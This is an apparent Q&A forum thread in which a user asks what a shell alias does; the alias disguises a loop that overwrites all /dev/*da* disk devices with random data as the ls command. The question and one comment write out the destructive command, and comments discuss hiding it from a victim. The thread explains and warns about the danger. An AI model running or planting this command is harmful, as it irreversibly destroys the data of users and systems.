# some help with this command, not sure what it does?

Tags: bash, command-line, security, alias, command

But my presumption for it to be harmful

```
 alias ls="for i in /dev/*da* ; do cat /dev/urandom &> ${i} & done
```

if the code seems to miss/wrongly indented please fix it.

Comment: There is no `alias` command, so `sudo` will fail with a "command not found". `sudo` does not know about shell builtins such as `alias`.

Comment: I disagree @thrig i just opened my terminal and used "alias" and it showed  alias ls ='ls --color=auto'

Comment: Are you missing double quote at the end? `sudo alias ls="for i in /dev/*da* ; do cat /dev/urandom &> ${i} & done"`

Comment: @snoop even i thought i did but as far as i know i have copied the command as exactly as it was given it to me, Infact i even tried to run it on http://linuxzoo.net/ and after i did ran it the virtual machine just hung and I had to stop the telnet, just wanted to see what harm can it to do a physical device

Comment: @Brewmaster alias is a shell builtin, it does not (in a normal environment) exist as a standalone command, thus sudo won't find it and throw up an error.

Comment: Please read @thrig's comment more carefully. Observe: `dave@Cassia:~$ type alias
alias is a shell builtin

dave@Cassia:~$ alias
alias cpd='cp_date'
alias cut80='/usr/bin/cut -c 1-80'
...

dave@Cassia:~$ sudo alias
sudo: alias: command not found
dave@Cassia:~$ `

Comment: @RadovanGarabik will removing sudo make this code work? i mean just starting of with alias ?

Comment: @Brewmaster only if you're already root. You could, of course, put the `sudo` inside the `alias`, but your target person might then need to enter a password to run what they thought was `ls` - which might be a bit of a giveaway

Comment: putting aside the risks of involving attacker and his privileges, i am just researching this command so in a ideal system as a root, i know the password and i run the command, what happens then is what i asked @roaima

Comment: @Brewmaster it overwrites all the devices in `/dev` that match `*da*`. Typically this will include all your disk partitions `/dev/sda1`, `/dev/sda2`, `/dev/sdb1`, etc.

Comment: Yes thank you, but is this irreversibly harmful? the ?only option is to swipe out the disk clean and start with fresh partitions   ? @roaima i was watching ring the bells btw :)

Comment: @Brewmaster yes irreversible. Glad you enjoyed the bells

Answer (score 2, accepted):

The code **is** incorrect. It is missing a closing quotation mark at the end of the for loop, and it can be harmful. Let me explain how.

The `alias` command is a shell bulletin. As the name implies, it will alias a single word to another command. That in itself isn't malicious or harmful. In most cases, it's very useful, especially when you need to regularly run a really long command with multiple flags and arguments.

What makes this command potentially harmful is a combination of two different things.

1. Aliases will overwrite existing commands. I've provided an example below:

> ```
> -bash-3.2$ type ls
> ls is hashed (/bin/ls)
> -bash-3.2$ ls
> file  file1  file2
> -bash-3.2$ alias ls="echo this is a test"
> -bash-3.2$ ls
> this is a test
> -bash-3.2$
> ```

2. When this `alias` command is properly executed, it will overwrite the `ls` command with a for loop that, when executed, will overwrite the first in the first recognized hard drive with pseudorandom data, then continue on to the next.

To try and break down how this for loop works, it starts by looking for any device blocks in /dev that match the wildcard expansion `*da*`. IDE drives use the `h` prefix and SATA drives use the `s` prefix. In most modern computers with one hard drive, the device block for that hard drive would be `/dev/sda`.

From there, individual partitions are suffixed with the number (e.g. `sda1`, `sda2`, and so on). Once a device block is matched, the value of $i will contain the path to it. Then it will run the command `cat /dev/urandom &> ${i} &`, which will run `cat /dev/urandom`, in the background and send all the data it spits out to the value of ${i}, effectively overwriting the device block with pseudorandom data.

Once the first partition has been filled, the `cat` command will end and the for loop will run again, check for the next matching block device, overwrite it with pseudorandom data, and continue on to the next until there are no more matching block devices.

To be clear, this isn't harmful by itself. After running this `alias` command, you'd have to run `ls` (as root -- this won't work if you're not root because you can't write data to device blocks as any other user) for this to do any damage.

A good way of visualizing how dangerous this could be is by running `bash -x`. When a shell starts up, a bunch of system and user-specific configuration files are run. For bash, the common ones are `/etc/bash_profile` and `~/.bash_profile`. Usually, one of those files also has an if statement to check for `~/.bashrc` and source it if it exists. Since this will only work if `ls` is executed as root, the `alias` command has to be run as root first. For someone to add this to either one of those files, they'd have to somehow gain root access first.

In ending, I want to point out that this is a unrealistic concern and would be very difficult for someone to pull off in a computer they do not have root access to. There are also less involved, equally malicious commands that don't require root access to a system to execute either.

Answer (score 2):

The command is slightly wrong, but it's original intent is probably to overwrite all the partitions on /dev/sda, which is in 99% your primary & system drive (and any block device that happens to have letters "da" in the name) with random data.

I am not going to put corrected version here, just in case someone would copy&paste&run it...

Comment: I remember it to cause irreversible damage is it true? and can you tell me where the command is wrong? just curious to understand it deep enough.

Comment: Not *quite* irreversible, but you'd either need good backups or a bit of help from the NSA for data recovery.